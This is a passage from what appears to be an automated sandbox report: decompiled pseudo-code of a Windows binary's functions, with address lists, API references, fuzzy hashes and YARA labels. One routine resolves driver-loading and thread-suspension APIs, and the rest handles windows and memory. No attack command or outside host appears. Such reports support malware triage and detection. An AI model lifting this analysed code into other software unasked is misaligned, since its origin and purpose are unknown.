				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}

0x004068ec
0x004068f0
0x004068f4
0x004068ff
0x00406902
0x0040690a
0x00406910
0x00406911
0x0040691b
0x0040691e
0x00406923
0x0040692d
0x0040692e
0x00406933
0x0040693d
0x00406940
0x00406949
0x0040694a
0x00406950
0x00406956
0x00406959
0x0040695c
0x00406964
0x0040696d
0x00406974
0x0040697e
0x00406989
0x00406990
0x00406998
0x0040699b
0x0040699f
0x004069b8
0x004069bc
0x004069c4
0x004069c7
0x004069c7
0x004069cb
0x004069ce
0x004069d4
0x004069d4
0x004069d9
0x004069df
0x004069e6
0x004069ea
0x004069ef
0x004069f2
0x004069f5
0x00406a00
0x00406a01
0x00406a06
0x00406a08
0x00406a0b
0x00406a10
0x00406a16
0x00406a25
0x00406a25
0x00406a18
0x00406a1e
0x00406a1e
0x00406a27
0x00406a2f
0x00406a32
0x00406a35
0x00406a3b
0x00406a41
0x00406a47
0x00406a4d
0x00406a53
0x00406a5d
0x00406a6d

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??2@YAPAXI@Z.MSVCRT ref: 0040692E
??2@YAPAXI@Z.MSVCRT ref: 0040694A
memcpy.MSVCRT ref: 0040696D
memcpy.MSVCRT ref: 0040697E
??2@YAPAXI@Z.MSVCRT ref: 00406A01
??2@YAPAXI@Z.MSVCRT ref: 00406A0B

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID:
API String ID: 975042529-0
Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8

Uniqueness

Uniqueness Score: -1.00%

Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

0x004097b1
0x004097b9
0x004097bb
0x004097be
0x004097c3
0x004097ca
0x004097de
0x004097de
0x004097e3
0x004097e5
0x004097e5
0x004097ec
0x004097f3
0x004097f6
0x004097fe
0x00409802
0x00409805
0x0040980a
0x0040980d
0x00409810
0x00409822
0x00000000
0x00409827
0x0040982a
0x004098da
0x004098da
0x004098dc
0x004098e0
0x004098e9
0x004098ec
0x004098f6
0x004098f6
0x004098e2
0x00000000
0x004098e2
0x00409830
0x00409833
0x00409838
0x0040983b
0x0040983e
0x0040985f
0x0040985f
0x00409861
0x00409863
0x0040989e
0x004098b1
0x004098b8
0x004098c0
0x004098c5
0x004098d5
0x00409865
0x00409865
0x00409865
0x0040986c
0x00409878
0x0040987f
0x0040988a
0x0040988f
0x0040988f
0x0040986c
0x00000000
0x00409863
0x00409840
0x00409843
0x00409846
0x0040984b
0x00409852
0x00000000
0x00000000
0x00409854
0x0040985d
0x00000000
0x00000000
0x00000000
0x0040985d
0x00409894
0x00000000
0x00409894

APIs

Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

??2@YAPAXI@Z.MSVCRT ref: 004097F6
memset.MSVCRT ref: 00409805
memcpy.MSVCRT ref: 0040988A
memcpy.MSVCRT ref: 004098C0
??3@YAXPAX@Z.MSVCRT ref: 004098EC

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$memcpy$??2@??3@HandleModulememset
String ID:
API String ID: 3641025914-0
Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}

0x004067ac
0x004067af
0x004067b5
0x004067ba
0x004067bf
0x004067c1
0x004067c6
0x004067c7
0x004067cc
0x004067cd
0x004067d2
0x004067d4
0x004067d9
0x004067da
0x004067df
0x004067e0
0x004067e5
0x004067e7
0x004067ec
0x004067ed
0x004067f2
0x004067f3
0x004067f8
0x004067fa
0x004067ff
0x00406800
0x00406805
0x00406806
0x00406808
0x0040680f
0x00406810
0x00406812
0x00406817
0x0040681e
0x00406828
0x0040682b
0x0040682c
0x0040681e
0x00406835
0x00406839
0x00406841

APIs

Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791

??3@YAXPAX@Z.MSVCRT ref: 004067C7
??3@YAXPAX@Z.MSVCRT ref: 004067DA
??3@YAXPAX@Z.MSVCRT ref: 004067ED
??3@YAXPAX@Z.MSVCRT ref: 00406800
free.MSVCRT(00000000), ref: 00406839

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$free
String ID:
API String ID: 2241099983-0
Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED

Uniqueness

Uniqueness Score: -1.00%

Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}

0x00405d03
0x00405d06
0x00405d10
0x00405d17
0x00405d22
0x00405d32
0x00405d40
0x00405d48
0x00405d4e
0x00405d54
0x00405d59
0x00405d5c
0x00405d61
0x00405d67

APIs

GetParent.USER32(?), ref: 00405D0A
GetWindowRect.USER32 ref: 00405D17
GetClientRect.USER32 ref: 00405D22
MapWindowPoints.USER32 ref: 00405D32
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}

0x004083dc
0x004083e2
0x004083e9
0x004083ea
0x004083eb
0x004083f3
0x004083f6
0x004083f8
0x00408401
0x00408404
0x00408407
0x00408409
0x0040840c
0x00408413
0x0040841d
0x00408427
0x0040842c
0x0040842f
0x00408432
0x00408435
0x00408438
0x00408439
0x0040843e
0x0040843f
0x00408442
0x0040844a

APIs

??2@YAPAXI@Z.MSVCRT ref: 004083EB
memcpy.MSVCRT ref: 00408413
memcpy.MSVCRT ref: 0040841D
memcpy.MSVCRT ref: 00408427
??3@YAXPAX@Z.MSVCRT ref: 00408442

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$??2@??3@
String ID:
API String ID: 1252195045-0
Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98

Uniqueness

Uniqueness Score: -1.00%

Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}

0x00406746
0x00406746
0x0040674f
0x00406751
0x00406752
0x00406757
0x00406758
0x0040675d
0x0040675f
0x00406760
0x00406765
0x00406766
0x0040676e
0x00406770
0x00406771
0x00406776
0x00406777
0x0040677f
0x00406781
0x00406785
0x00406787
0x00406788
0x0040678e
0x0040678e
0x00406790
0x00406791
0x00406796
0x00406798
0x0040679e
0x004067a1
0x004067a4
0x004067ab

APIs

??3@YAXPAX@Z.MSVCRT ref: 00406752
??3@YAXPAX@Z.MSVCRT ref: 00406760
??3@YAXPAX@Z.MSVCRT ref: 00406771
??3@YAXPAX@Z.MSVCRT ref: 00406788
??3@YAXPAX@Z.MSVCRT ref: 00406791

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}

0x0040aba8
0x0040aba9
0x0040abb0
0x0040abb2
0x0040abb5
0x0040ac19
0x0040ac2c
0x0040ac2e
0x0040ac36
0x0040ac39
0x0040ac39
0x0040ac1b
0x0040ac21
0x0040ac21
0x0040abb7
0x0040abcb
0x0040abce
0x0040abd7
0x0040abe6
0x0040abf6
0x0040abfe
0x0040ac09
0x0040ac0f
0x0040ac12
0x0040ac4f

APIs

BeginDeferWindowPos.USER32 ref: 0040ABBA

Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4

EndDeferWindowPos.USER32(?), ref: 0040ABFE
InvalidateRect.USER32(?,?,00000001), ref: 0040AC09

Strings

$, xrefs: 0040AC28

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: DeferWindow$Rect$BeginClientInvalidateItem
String ID: $
API String ID: 2498372239-3993045852
Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}

0x00403a7d
0x00403a8c
0x00403a9c
0x00403aba
0x00403adf
0x00403ae7
0x00403af4
0x00403af4
0x00403ae7
0x00403aba
0x00403a9c
0x00403b13

APIs

GetKeyState.USER32(000000A2), ref: 00403A8C

Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64

SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C

Strings

A, xrefs: 00403A7F

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: State$CallMessageProcSendWindow
String ID: A
API String ID: 3924021322-3554254475
Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59

Uniqueness

Uniqueness Score: -1.00%

Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}

0x004034f0
0x004034f8
0x00403506
0x00403516
0x0040351c
0x00403531
0x00403537
0x00403545
0x0040354a
0x00403556
0x00403567
0x00403575
0x00403583
0x00403583
0x00403586
0x00403592
0x00403598
0x004035ac

APIs

Part of subcall function 00402923: memset.MSVCRT ref: 00402935

Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722

memset.MSVCRT ref: 00403537
_ultow.MSVCRT ref: 00403575

Strings

cf@, xrefs: 0040352B
q, xrefs: 00403556

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset$_ultow
String ID: cf@$q
API String ID: 3448780718-2693627795
Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
